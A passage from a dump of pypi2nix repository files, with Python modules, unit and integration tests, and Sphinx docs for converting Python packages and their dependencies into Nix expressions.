pyproject_toml_candidates:\n with open(pyproject_toml_candidates[0]) as f:\n content = f.read()\n return PyprojectToml(\n name=name,\n file_content=content,\n requirement_parser=requirement_parser,\n logger=logger,\n )\n else:\n return None\n\n @classmethod\n def get_setup_cfg(\n _,\n extracted_files: Iterable[str],\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> Optional[SetupCfg]:\n setup_cfg_candidates = [\n filepath\n for filepath in extracted_files\n if os.path.basename(filepath) == \"setup.cfg\"\n ]\n if setup_cfg_candidates:\n return SetupCfg(\n setup_cfg_path=setup_cfg_candidates[0],\n logger=logger,\n requirement_parser=requirement_parser,\n )\n else:\n return None\n\n @classmethod\n def _get_package_metadata(self, path: str) -> Optional[PackageMetadata]:\n try:\n return PackageMetadata.from_package_directory(path=path)\n except DistributionNotDetected:\n return None\n\n @classmethod\n def _get_name(\n self,\n setup_cfg: Optional[SetupCfg],\n metadata: Optional[PackageMetadata],\n archive: Archive,\n ) -> str:\n if setup_cfg and metadata:\n if setup_cfg.name != metadata.name and setup_cfg.name is not None:\n raise DistributionNotDetected(\n f\"Conflicting name information from setup.cfg ({setup_cfg.name}) and PKG-INFO ({metadata.name}) in {archive}\"\n )\n else:\n return metadata.name\n elif setup_cfg and setup_cfg.name is not None:\n return setup_cfg.name\n elif metadata is not None:\n return metadata.name\n else:\n raise DistributionNotDetected(\n f\"Neither PKG-INFO nor setup.cfg are present in {archive}\"\n )\n\n def to_loose_requirement(self) -> Requirement:\n return VersionRequirement(\n name=self.name,\n versions=[],\n extras=set(),\n environment_markers=None,\n logger=self.logger,\n )\n\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n build_dependencies = RequirementSet(target_platform)\n if self.pyproject_toml is not None:\n build_dependencies += self.pyproject_toml.build_dependencies(\n target_platform\n )\n if self.setup_cfg is not None:\n build_dependencies += self.setup_cfg.build_dependencies(target_platform)\n return build_dependencies.filter(\n lambda requirement: requirement.name != self.name\n )\n\n def __str__(self) -> str:\n return f\"SourceDistribution<name={self.name}>\"\n\n def __repr__(self) -> str:\n return f\"SourceDistribution(name={self.name}, logger={self.logger}, requirement_parser={self.requirement_parser}, pyproject_toml={self.pyproject_toml}, setup_cfg={self.setup_cfg})\"\n" }, { "alpha_fraction": 0.5592864751815796, "alphanum_fraction": 0.5645330548286438, "avg_line_length": 32.1478271484375, "blob_id": "b94b6a0347a458e9e3d9a5b9989809043cad2ac6", "content_id": "2186f20abce243ae224b170da3b631c90ce11eca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3812, "license_type": "no_license", "max_line_length": 102, "num_lines": 115, "path": "/src/pypi2nix/metadata_fetcher.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "\"\"\"Parse metadata from .dist-info directories in a wheelhouse.\"\"\"\n# flake8: noqa: E501\n\nimport email\nimport hashlib\nimport json\nimport os.path\nimport tempfile\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Iterable\nfrom typing import List\nfrom urllib.request import urlopen\n\nimport click\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import UrlSource\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom 
pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.source_distribution import SourceDistribution\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.utils import cmd\nfrom pypi2nix.utils import prefetch_git\nfrom pypi2nix.wheel import Wheel\n\n\nclass MetadataFetcher:\n def __init__(\n self,\n sources: Sources,\n logger: Logger,\n requirement_parser: RequirementParser,\n pypi: Pypi,\n ) -> None:\n self.sources = sources\n self.logger = logger\n self.requirement_parser = requirement_parser\n self.pypi = pypi\n\n def main(\n self,\n wheel_paths: Iterable[str],\n target_platform: TargetPlatform,\n source_distributions: Dict[str, SourceDistribution],\n ) -> List[Wheel]:\n \"\"\"Extract packages metadata from wheels dist-info folders.\n \"\"\"\n output = \"\"\n metadata: List[Wheel] = []\n\n self.logger.info(\n \"-- sources ---------------------------------------------------------------\"\n )\n for name, source in self.sources.items():\n self.logger.info(\"{name}, {source}\".format(name=name, source=name))\n self.logger.info(\n \"--------------------------------------------------------------------------\"\n )\n\n wheels = []\n for wheel_path in wheel_paths:\n\n self.logger.debug(\"|-> from %s\" % os.path.basename(wheel_path))\n\n wheel_metadata = Wheel.from_wheel_directory_path(\n wheel_path, target_platform, self.logger, self.requirement_parser\n )\n if not wheel_metadata:\n continue\n\n if wheel_metadata.name in source_distributions:\n source_distribution = source_distributions[wheel_metadata.name]\n wheel_metadata.add_build_dependencies(\n source_distribution.build_dependencies(target_platform)\n )\n wheel_metadata.package_format = source_distribution.package_format\n\n wheels.append(wheel_metadata)\n\n self.logger.debug(\n \"-- wheel_metadata --------------------------------------------------------\"\n )\n self.logger.debug(\n json.dumps(wheel_metadata.to_dict(), sort_keys=True, indent=4)\n )\n self.logger.debug(\n \"--------------------------------------------------------------------------\"\n )\n\n self.process_wheel(wheel_metadata)\n return wheels\n\n def process_wheel(self, wheel: Wheel) -> None:\n if wheel.name not in self.sources:\n release = self.pypi.get_source_release(wheel.name, wheel.version)\n if release:\n source = UrlSource(\n url=release.url,\n logger=self.logger,\n hash_value=release.sha256_digest,\n )\n self.sources.add(wheel.name, source)\n else:\n self.logger.error(\n f\"Failed to query pypi for release name=`{wheel.name}`, version=`{wheel.version}`\"\n )\n raise MetadataFetchingFailed()\n\n\nclass MetadataFetchingFailed(Exception):\n pass\n" }, { "alpha_fraction": 0.6538860201835632, "alphanum_fraction": 0.6901554465293884, "avg_line_length": 24.394737243652344, "blob_id": "212800e656be576e9426d57275337664e43cff9b", "content_id": "b9d082a309f1179ec83e9b0fb77f683a37d547e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 965, "license_type": "no_license", "max_line_length": 87, "num_lines": 38, "path": "/src/pypi2nix/python_version.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from enum import Enum\nfrom enum import unique\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\n\n@unique\nclass PythonVersion(Enum):\n python35 = \"python35\"\n python36 = \"python36\"\n python37 = \"python37\"\n python38 = \"python38\"\n python3 = \"python3\"\n\n def 
nixpkgs_attribute(self) -> str:\n return self.value # type: ignore\n\n def derivation_name(self) -> str:\n return self.value # type: ignore\n\n def major_version(self) -> str:\n return self.derivation_name().replace(\"python\", \"\")[0]\n\n\n_PYTHON_VERSIONS: Dict[str, PythonVersion] = {\n \"3.5\": PythonVersion.python35,\n \"3.6\": PythonVersion.python36,\n \"3.7\": PythonVersion.python37,\n \"3.8\": PythonVersion.python38,\n}\n\n\ndef python_version_from_version_string(version_string: str) -> Optional[PythonVersion]:\n return _PYTHON_VERSIONS.get(version_string)\n\n\navailable_python_versions: List[str] = [version.name for version in PythonVersion]\n" }, { "alpha_fraction": 0.446841299533844, "alphanum_fraction": 0.4653312861919403, "avg_line_length": 23.037036895751953, "blob_id": "40df1786414831ab5f3516f8e5bd6ae48bee844d", "content_id": "4da0d166d594fc9f6ed034e1268da71a265c61e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 649, "license_type": "no_license", "max_line_length": 56, "num_lines": 27, "path": "/src/pypi2nix/wheels/schema.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "URL_SCHEMA = {\n \"type\": \"object\",\n \"properties\": {\n \"sha256\": {\"type\": \"string\"},\n \"url\": {\"type\": \"string\"},\n \"__type__\": {\"const\": \"fetchurl\",},\n },\n \"required\": [\"sha256\", \"url\", \"__type__\"],\n}\n\nGIT_SCHEMA = {\n \"type\": \"object\",\n \"properties\": {\n \"sha256\": {\"type\": \"string\"},\n \"url\": {\"type\": \"string\"},\n \"rev\": {\"type\": \"string\"},\n \"__type__\": {\"const\": \"fetchgit\"},\n },\n \"required\": [\"sha256\", \"url\", \"rev\", \"__type__\"],\n}\n\nINDEX_ITEM_SCHEMA = {\"anyOf\": [URL_SCHEMA, GIT_SCHEMA,]}\n\nINDEX_SCHEMA = {\n \"type\": \"object\",\n \"additionalProperties\": INDEX_ITEM_SCHEMA,\n}\n" }, { "alpha_fraction": 0.7270854711532593, "alphanum_fraction": 0.7466529607772827, "avg_line_length": 30.322580337524414, "blob_id": "9fd3c0fce5f1bb305df9055a2f79874458dcfc7f", "content_id": "09c18eba6d17215bfc0030762cd673148a2bf7b7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 971, "license_type": "permissive", "max_line_length": 88, "num_lines": 31, "path": "/unittests/test_python_version.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.python_version import python_version_from_version_string\nfrom pypi2nix.target_platform import PlatformGenerator\n\nfrom .switches import nix\n\n\n@pytest.mark.parametrize(\"python_version\", PythonVersion)\n@nix\ndef test_available_python_versions_exist_in_nixpkgs(\n python_version: PythonVersion, platform_generator: PlatformGenerator\n):\n target_platform = platform_generator.from_python_version(python_version)\n assert target_platform is not None\n\n\n@pytest.mark.parametrize(\n \"version_string, expected_python_version\",\n [\n (\"3.5\", PythonVersion.python35),\n (\"3.6\", PythonVersion.python36),\n (\"3.7\", PythonVersion.python37),\n (\"3.8\", PythonVersion.python38),\n ],\n)\ndef test_can_get_python_version_from_version_string(\n version_string, expected_python_version\n):\n assert python_version_from_version_string(version_string) == expected_python_version\n" }, { "alpha_fraction": 0.7230088710784912, "alphanum_fraction": 0.7274336218833923, "avg_line_length": 33.24242401123047, "blob_id": "bb19888a3d6d33a41e3e1e9344ae18b298197570", 
"content_id": "a37fc4491f9c2f18c525dae437b211e02d1f5109", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1130, "license_type": "no_license", "max_line_length": 63, "num_lines": 33, "path": "/src/pypi2nix/configuration.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import List\nfrom typing import Optional\n\nfrom attr import attrib\nfrom attr import attrs\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Verbosity\nfrom pypi2nix.overrides import Overrides\nfrom pypi2nix.path import Path\nfrom pypi2nix.python_version import PythonVersion\n\n\n@attrs\nclass ApplicationConfiguration:\n verbosity: Verbosity = attrib()\n nix_executable_directory: Optional[str] = attrib()\n nix_path: List[str] = attrib()\n extra_build_inputs: List[str] = attrib()\n emit_extra_build_inputs: bool = attrib()\n extra_environment: str = attrib()\n enable_tests: bool = attrib()\n python_version: PythonVersion = attrib()\n requirement_files: List[str] = attrib()\n requirements: List[str] = attrib()\n setup_requirements: List[str] = attrib()\n overrides: List[Overrides] = attrib()\n wheels_caches: List[str] = attrib()\n output_basename: str = attrib()\n project_directory: Path = attrib()\n target_directory: str = attrib()\n dependency_graph_output_location: Optional[Path] = attrib()\n dependency_graph_input: DependencyGraph = attrib()\n" }, { "alpha_fraction": 0.5500580072402954, "alphanum_fraction": 0.5624275207519531, "avg_line_length": 31.746835708618164, "blob_id": "7bdf3150415fc22799f5b4134a5826dc6fd68e83", "content_id": "01638817a40ee1c64432ff6c9efd3d285389b099", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2587, "license_type": "no_license", "max_line_length": 86, "num_lines": 79, "path": "/src/pypi2nix/wheels/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport os.path\nfrom collections import namedtuple\nfrom contextlib import contextmanager\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import Union\n\nfrom attr import attrib\nfrom attr import attrs\nfrom jsonschema import ValidationError\nfrom jsonschema import validate\n\nfrom pypi2nix.logger import Logger\n\nfrom .schema import GIT_SCHEMA\nfrom .schema import INDEX_SCHEMA\nfrom .schema import URL_SCHEMA\n\n\n@attrs\nclass Index:\n UrlEntry = namedtuple(\"UrlEntry\", [\"url\", \"sha256\"])\n GitEntry = namedtuple(\"GitEntry\", [\"url\", \"sha256\", \"rev\"])\n Entry = Union[UrlEntry, GitEntry]\n\n logger: Logger = attrib()\n path: str = attrib(default=os.path.join(os.path.dirname(__file__), \"index.json\"))\n\n def __getitem__(self, key: str) -> \"Index.Entry\":\n with self._index_json() as index:\n entry = index[key]\n if self._is_schema_valid(entry, URL_SCHEMA):\n return Index.UrlEntry(url=entry[\"url\"], sha256=entry[\"sha256\"])\n elif self._is_schema_valid(entry, GIT_SCHEMA):\n return Index.GitEntry(\n url=entry[\"url\"], sha256=entry[\"sha256\"], rev=entry[\"rev\"]\n )\n else:\n raise Exception()\n\n def __setitem__(self, key: str, value: \"Index.Entry\") -> None:\n with self._index_json(write=True) as index:\n if isinstance(value, self.UrlEntry):\n index[key] = {\n \"url\": value.url,\n \"sha256\": value.sha256,\n \"__type__\": \"fetchurl\",\n }\n if isinstance(value, self.GitEntry):\n index[key] = {\n \"url\": value.url,\n \"sha256\": value.sha256,\n \"rev\": value.rev,\n 
\"__type__\": \"fetchgit\",\n }\n\n def is_valid(self) -> bool:\n with self._index_json() as index:\n return self._is_schema_valid(index, INDEX_SCHEMA)\n\n @contextmanager\n def _index_json(self, write: bool = False) -> Iterator[Dict[str, Dict[str, str]]]:\n with open(self.path) as f:\n index = json.load(f)\n yield index\n if write:\n with open(self.path, \"w\") as f:\n json.dump(index, f, sort_keys=True, indent=4)\n\n def _is_schema_valid(self, json_value: Any, schema: Any) -> bool:\n try:\n validate(json_value, schema)\n except ValidationError as e:\n self.logger.error(str(e))\n return False\n else:\n return True\n" }, { "alpha_fraction": 0.5835829973220825, "alphanum_fraction": 0.5865787863731384, "avg_line_length": 36.088890075683594, "blob_id": "af20f65a461ab36a1b64bd01d8272968208d4b72", "content_id": "e951d9c3b5303d76e8524a8be54740417a52c51e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1669, "license_type": "no_license", "max_line_length": 84, "num_lines": 45, "path": "/src/pypi2nix/package/pyproject.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import toml\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .interfaces import HasBuildDependencies\n\n\nclass PyprojectToml(HasBuildDependencies):\n def __init__(\n self,\n name: str,\n file_content: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> None:\n self.pyproject_toml = toml.loads(file_content)\n self.logger = logger\n self.requirement_parser = requirement_parser\n self.name = name\n\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n requirement_set = RequirementSet(target_platform)\n if self.pyproject_toml is not None:\n for build_input in self.pyproject_toml.get(\"build-system\", {}).get(\n \"requires\", []\n ):\n try:\n requirement = self.requirement_parser.parse(build_input)\n except ParsingFailed as e:\n self.logger.warning(\n \"Failed to parse build dependency of `{name}`\".format(\n name=self.name\n )\n )\n self.logger.warning(\n \"Possible reason: `{reason}`\".format(reason=e.reason)\n )\n else:\n if requirement.applies_to_target(target_platform):\n requirement_set.add(requirement)\n return requirement_set\n" }, { "alpha_fraction": 0.5756263732910156, "alphanum_fraction": 0.5886173844337463, "avg_line_length": 27.610618591308594, "blob_id": "ccaf9437922df4dc8790d861046bb578b609d028", "content_id": "dd9343bc7949b616864d4d1a1ae531a59d63374f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3233, "license_type": "no_license", "max_line_length": 80, "num_lines": 113, "path": "/src/pypi2nix/network_file.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport tempfile\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom typing import Dict\nfrom typing import Optional\nfrom urllib.request import urlopen\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.memoize import memoize\nfrom pypi2nix.utils import cmd\nfrom pypi2nix.utils import prefetch_git\nfrom pypi2nix.utils import prefetch_url\n\n\nclass NetworkFile(metaclass=ABCMeta):\n @abstractmethod\n def nix_expression(self) -> str:\n pass\n\n @abstractmethod\n def fetch(self) -> str:\n pass\n\n\nclass 
UrlTextFile(NetworkFile):\n def __init__(\n self,\n url: str,\n logger: Logger,\n sha256: Optional[str] = None,\n name: Optional[str] = None,\n ) -> None:\n self.url = url\n self._sha256 = sha256\n self._logger = logger\n self._name = name\n\n def nix_expression(self) -> str:\n fetchurl_arguments = f'url = \"{self.url}\";'\n fetchurl_arguments += f'sha256 = \"{self.sha256}\";'\n if self._name:\n fetchurl_arguments += f'name = \"{self._name}\";'\n return f\"pkgs.fetchurl {{ {fetchurl_arguments} }}\"\n\n @property # type: ignore\n @memoize\n def sha256(self) -> str:\n if self._sha256:\n return self._sha256\n else:\n return prefetch_url(self.url, self._logger, name=self._name)\n\n def fetch(self) -> str:\n with urlopen(self.url) as content:\n return content.read().decode(\"utf-8\") # type: ignore\n\n\nclass GitTextFile(NetworkFile):\n def __init__(\n self, repository_url: str, revision_name: str, path: str, logger: Logger\n ) -> None:\n self.repository_url = repository_url\n self._revision_name = revision_name\n self.path = path\n self._logger = logger\n\n def nix_expression(self) -> str:\n fetchgit_arguments = f'url = \"{self.repository_url}\";'\n fetchgit_arguments += f'sha256 = \"{self.sha256}\";'\n fetchgit_arguments += f'rev = \"{self.revision}\";'\n fetchgit_expression = f\"pkgs.fetchgit {{ {fetchgit_arguments} }}\"\n return f'\"${{ {fetchgit_expression } }}/{self.path}\"'\n\n @property\n def revision(self) -> str:\n return self._prefetch_data[\"rev\"]\n\n @property\n def sha256(self) -> str:\n return self._prefetch_data[\"sha256\"]\n\n @property # type: ignore\n @memoize\n def _prefetch_data(self) -> Dict[str, str]:\n return prefetch_git(self.repository_url, self._revision_name)\n\n @memoize\n def fetch(self) -> str:\n with tempfile.TemporaryDirectory() as target_directory:\n cmd(\n [\"git\", \"clone\", self.repository_url, target_directory],\n logger=self._logger,\n )\n cmd(\n [\"git\", \"checkout\", self._revision_name],\n logger=self._logger,\n cwd=target_directory,\n )\n with open(os.path.join(target_directory, self.path)) as f:\n return f.read()\n\n\nclass DiskTextFile(NetworkFile):\n def __init__(self, path: str):\n self._path = path\n\n def nix_expression(self) -> str:\n return self._path\n\n def fetch(self) -> str:\n with open(self._path) as f:\n return f.read()\n" }, { "alpha_fraction": 0.6657534241676331, "alphanum_fraction": 0.7735159993171692, "avg_line_length": 36.75862121582031, "blob_id": "dba7041e3aec95209008b02695112a19736f454a", "content_id": "441041f1b17a94ceb2961f323a1984f33de3815b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "permissive", "max_line_length": 120, "num_lines": 29, "path": "/unittests/test_prefetch_url.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.utils import prefetch_url\n\nfrom .switches import nix\n\n\n@nix\ndef test_prefetch_url_returns_correct_hash(logger):\n url = \"https://github.com/nix-community/pypi2nix/archive/4e85fe7505dd7e703aacc18d9ef45f7e47947a6a.zip\"\n expected_hash = \"1x3dzqlnryplmxm3z1lnl40y0i2g8n6iynlngq2kkknxj9knjyhv\"\n assert prefetch_url(url, logger) == expected_hash\n\n\n@nix\ndef test_prefetch_url_raises_on_invalid_name(logger):\n \"\"\"nix-prefetch-url cannot handle file names with period in them. 
Here\n we test if the code throws a ValueError in that instance.\n \"\"\"\n url = \"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\"\n with pytest.raises(ValueError):\n prefetch_url(url, logger)\n\n\n@nix\ndef test_can_provide_name_so_prefetch_does_not_fail(logger):\n url = \"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\"\n sha256 = prefetch_url(url, logger, name=\"testname\")\n assert sha256 == \"0b2s1lyfr12v83rrb69j1cfcsksisgwyzfl5mix6qz5ldxfww8p0\"\n" }, { "alpha_fraction": 0.5631901621818542, "alphanum_fraction": 0.5803681015968323, "avg_line_length": 13.348591804504395, "blob_id": "c89b18347af7e45ab93dd2ae65d6c52111381fff", "content_id": "426cab1ef22a8a08de65203e25bf4702acd93eb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4075, "license_type": "no_license", "max_line_length": 47, "num_lines": 284, "path": "/source/modules.rst", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "Modules\n=======\n\npypi2nix.logger\n---------------\n\n.. automodule:: pypi2nix.logger\n :members:\n :undoc-members:\n\n\npypi2nix.dependency_graph\n-------------------------\n\n.. automodule:: pypi2nix.dependency_graph\n :members:\n :undoc-members:\n\n\npypi2nix.external_dependencies\n------------------------------\n\n.. automodule:: pypi2nix.external_dependencies\n :members:\n :undoc-members:\n :imported-members:\n\n\npypi2nix.wheels\n---------------\n\n.. automodule:: pypi2nix.wheels\n :members:\n :undoc-members:\n\n\npypi2nix.wheel_builder\n----------------------\n\n.. automodule:: pypi2nix.wheel_builder\n :members:\n :undoc-members:\n\n\npypi2nix.wheel\n--------------\n\n.. automodule:: pypi2nix.wheel\n :members:\n :undoc-members:\n\n\npypi2nix.version\n----------------\n\n.. automodule:: pypi2nix.version\n :members:\n :undoc-members:\n\n\npypi2nix.utils\n--------------\n\n.. automodule:: pypi2nix.utils\n :members:\n :undoc-members:\n\n\npypi2nix.target_platform\n------------------------\n\n.. automodule:: pypi2nix.target_platform\n :members:\n :undoc-members:\n\n\npypi2nix.sources\n----------------\n\n.. automodule:: pypi2nix.sources\n :members:\n :undoc-members:\n\n\npypi2nix.source_distribution\n----------------------------\n\n.. automodule:: pypi2nix.source_distribution\n :members:\n :undoc-members:\n\n\npypi2nix.requirements_file\n--------------------------\n\n.. automodule:: pypi2nix.requirements_file\n :members:\n :undoc-members:\n\n\npypi2nix.requirements_collector\n-------------------------------\n\n.. automodule:: pypi2nix.requirements_collector\n :members:\n :undoc-members:\n\n\npypi2nix.requirements\n---------------------\n\n.. automodule:: pypi2nix.requirements\n :members:\n :undoc-members:\n\n\npypi2nix.requirement_set\n------------------------\n\n.. automodule:: pypi2nix.requirement_set\n :members:\n :undoc-members:\n\n\npypi2nix.requirement_parser\n---------------------------\n\n.. automodule:: pypi2nix.requirement_parser\n :members:\n :undoc-members:\n\n\npypi2nix.python_version\n-----------------------\n\n.. automodule:: pypi2nix.python_version\n :members:\n :undoc-members:\n\n\npypi2nix.pypi_release\n---------------------\n\n.. automodule:: pypi2nix.pypi_release\n :members:\n :undoc-members:\n\n\npypi2nix.pypi_package\n---------------------\n\n.. automodule:: pypi2nix.pypi_package\n :members:\n :undoc-members:\n\n\npypi2nix.pypi\n-------------\n\n.. 
automodule:: pypi2nix.pypi\n :members:\n :undoc-members:\n\n\npypi2nix.project_directory\n--------------------------\n\n.. automodule:: pypi2nix.project_directory\n :members:\n :undoc-members:\n\n\npypi2nix.pip\n------------\n\n.. automodule:: pypi2nix.pip\n :members:\n :undoc-members:\n :imported-members:\n\n\npypi2nix.package_source\n-----------------------\n\n.. automodule:: pypi2nix.package_source\n :members:\n :undoc-members:\n\n\npypi2nix.package\n----------------\n\n.. automodule:: pypi2nix.package\n :members:\n :undoc-members:\n :imported-members:\n\n\npypi2nix.overrides\n------------------\n\n.. automodule:: pypi2nix.overrides\n :members:\n :undoc-members:\n\n\npypi2nix.nix_language\n---------------------\n\n.. automodule:: pypi2nix.nix_language\n :members:\n :undoc-members:\n\n\npypi2nix.nix\n------------\n\n.. automodule:: pypi2nix.nix\n :members:\n :undoc-members:\n\n\npypi2nix.metadata_fetcher\n-------------------------\n\n.. automodule:: pypi2nix.metadata_fetcher\n :members:\n :undoc-members:\n\n\npypi2nix.memoize\n----------------\n\n.. automodule:: pypi2nix.memoize\n :members:\n :undoc-members:\n\n\npypi2nix.main\n-------------\n\n.. automodule:: pypi2nix.main\n :members:\n :undoc-members:\n\n\npypi2nix.license\n----------------\n\n.. automodule:: pypi2nix.license\n :members:\n :undoc-members:\n\n\npypi2nix.environment_marker\n---------------------------\n\n.. automodule:: pypi2nix.environment_marker\n :members:\n :undoc-members:\n\n\npypi2nix.configuration\n----------------------\n\n.. automodule:: pypi2nix.configuration\n :members:\n :undoc-members:\n\n\npypi2nix.cli\n------------\n\n.. automodule:: pypi2nix.cli\n :members:\n :undoc-members:\n\n\npypi2nix.archive\n----------------\n\n.. automodule:: pypi2nix.archive\n :members:\n :undoc-members:\n" }, { "alpha_fraction": 0.6299835443496704, "alphanum_fraction": 0.6326194405555725, "avg_line_length": 34.70588302612305, "blob_id": "73a3c3cc6357e55848ed62737f5146edbb974112", "content_id": "b8abe706f49b267b94f7ac25c5277e6c01b62001", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3035, "license_type": "permissive", "max_line_length": 88, "num_lines": 85, "path": "/unittests/package_generator.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import shutil\nimport subprocess\nfrom tempfile import TemporaryDirectory\nfrom typing import List\n\nfrom attr import attrib\nfrom attr import attrs\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.source_distribution import SourceDistribution\n\nfrom .templates import render_template\n\n\n@attrs\nclass PackageGenerator:\n \"\"\"Generate source distributions on for testing\n\n This class aims to provide an easy to use way of generating test\n data. 
Since pypi2nix deals a lot with python packages it is\n necessary have python packages available for testing.\n \"\"\"\n\n _target_directory: Path = attrib()\n _requirement_parser: RequirementParser = attrib()\n _logger: Logger = attrib()\n\n def generate_setuptools_package(\n self, name: str, version: str = \"1.0\", install_requires: List[str] = []\n ) -> SourceDistribution:\n with TemporaryDirectory() as directory_path_string:\n build_directory: Path = Path(directory_path_string)\n self._generate_setup_py(build_directory, name=name, version=version)\n self._generate_setup_cfg(\n build_directory,\n name=name,\n version=version,\n install_requires=install_requires,\n )\n built_distribution_archive = self._build_package(\n build_directory=build_directory, name=name, version=version\n )\n source_distribution = SourceDistribution.from_archive(\n built_distribution_archive,\n logger=self._logger,\n requirement_parser=self._requirement_parser,\n )\n self._move_package_target_directory(built_distribution_archive)\n return source_distribution\n\n def _generate_setup_py(\n self, target_directory: Path, name: str, version: str\n ) -> None:\n content = render_template(Path(\"setup.py\"), context={},)\n (target_directory / \"setup.py\").write_text(content)\n\n def _generate_setup_cfg(\n self,\n target_directory: Path,\n name: str,\n version: str,\n install_requires: List[str],\n ) -> None:\n content = render_template(\n Path(\"setup.cfg\"),\n context={\n \"name\": name,\n \"version\": version,\n \"install_requires\": install_requires,\n },\n )\n (target_directory / \"setup.cfg\").write_text(content)\n\n def _build_package(self, build_directory: Path, name: str, version: str) -> Archive:\n subprocess.run(\n [\"python\", \"setup.py\", \"sdist\"], cwd=str(build_directory), check=True\n )\n tar_gz_path = build_directory / \"dist\" / f\"{name}-{version}.tar.gz\"\n return Archive(path=str(tar_gz_path))\n\n def _move_package_target_directory(self, distribution_archive: Archive) -> None:\n shutil.copy(distribution_archive.path, str(self._target_directory))\n" }, { "alpha_fraction": 0.7098976373672485, "alphanum_fraction": 0.7098976373672485, "avg_line_length": 28.299999237060547, "blob_id": "d35973b9f9ccdd45b196c9832739ad03b0d19f9e", "content_id": "713d5afcaca13df2c1fa2c63dd8ee77ff123c6db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 48, "num_lines": 10, "path": "/integrationtests/test_setuptools.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass SetuptoolsTestCase(IntegrationTest):\n name_of_testcase = \"setuptools\"\n code_to_test = [\"import setuptools\"]\n requirements = [\"setuptools\"]\n\n def requirements_file_check(self, content):\n self.assertIn('\"setuptools\" =', content)\n" }, { "alpha_fraction": 0.6382794976234436, "alphanum_fraction": 0.6387117505073547, "avg_line_length": 39.056278228759766, "blob_id": "a3bbce53cf3c4088667d0aaf801521ac03c8ba8a", "content_id": "6bcfb63bb161f7c4490cf76f2fa104ea29b140d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9253, "license_type": "no_license", "max_line_length": 88, "num_lines": 231, "path": "/src/pypi2nix/dependency_graph.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from collections import defaultdict\nfrom copy import copy\nfrom typing import Callable\nfrom typing import 
